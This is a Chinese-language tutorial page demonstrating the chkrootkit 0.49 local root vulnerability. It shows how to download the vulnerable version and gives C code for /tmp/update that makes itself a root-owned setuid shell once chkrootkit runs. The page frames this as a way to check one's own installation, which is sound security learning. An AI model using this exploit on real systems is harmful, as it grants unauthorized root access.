在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提权漏洞。先来演示下吧: 可以查看自己安装的是不是升到最新版了,或者下载有漏洞的版本进行实验: wget wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gztar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gzcd chkrootkit-0.49/ ./chkrootkit -V 普通用户在 /tmp 目录下新建 update.c(代码实示例如下): #include <unistd.h> void main(void) { system("chown root:root /tmp/update"); system("chmod 4755 /tmp/update"); setuid(0); setgid(0); execl("/bin/sh","sh",NULL); } 然后编译好 update ,看下update的文件详情:
执行有漏洞的 chkrootkit :
再来看下 update 已经成功属于 root 组了!
以上就是查看自己 Ckrootkit 0.49 是不是安装的是不是升到最新版了,或者下载有漏洞的版本进行实验的步骤,谢谢阅读,希望能帮到大家,请继续关注极客世界,我们会努力分享更多优秀的文章。 |
2023-10-27
2022-08-15
2022-08-17
2022-09-23
2022-08-13
请发表评论